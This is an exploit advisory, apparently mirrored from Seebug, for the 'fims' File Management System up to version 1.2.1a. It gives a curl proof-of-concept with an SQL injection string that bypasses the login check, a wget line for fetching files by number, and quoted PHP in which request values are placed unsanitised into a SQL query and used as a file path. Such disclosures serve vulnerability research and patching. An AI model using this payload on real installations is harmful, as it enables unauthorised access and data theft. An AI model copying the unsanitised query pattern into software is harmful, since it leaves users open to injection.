fims File Management System <= 1.2.1a Multiple Vulnerabilities

ID SSV:72243
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                # Exploit Title: fims - File Management System <= 1.2.1a SQL Injection and  Vulnerability
# Date: 2011-10-19
# Author: Skraps (jackie.craig.sparks(at) jackie.craig.sparks(at) @skraps_foo)
# Software Link:
# Version: 1.2.1a (tested)

PoC (POST or GET data)
curl --data "') or id=ABS('1"
wget "{anyfile number}"

Vulnerable code
Line 18 of index.php:
  if (login($g_db, $_REQUEST[email], $_REQUEST[password]))
Line 117 of functions.php:
        function login($db, $email, $password)
                $rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
                if ($db->numrows($rs)>0) return true;
                else return false;

Line 51 of index.php:
                if (isset($_REQUEST[f]))
                        $file = get_file_data($g_db, $_REQUEST[f]);
                        header("Accept-Ranges: bytes");
                        header("Content-Length: ".filesize("files/".$file[id]));
                        header("Content-Type: {$file[mime]}");
                        header("Content-Disposition: inline; filename=\"{$file['label']}\";");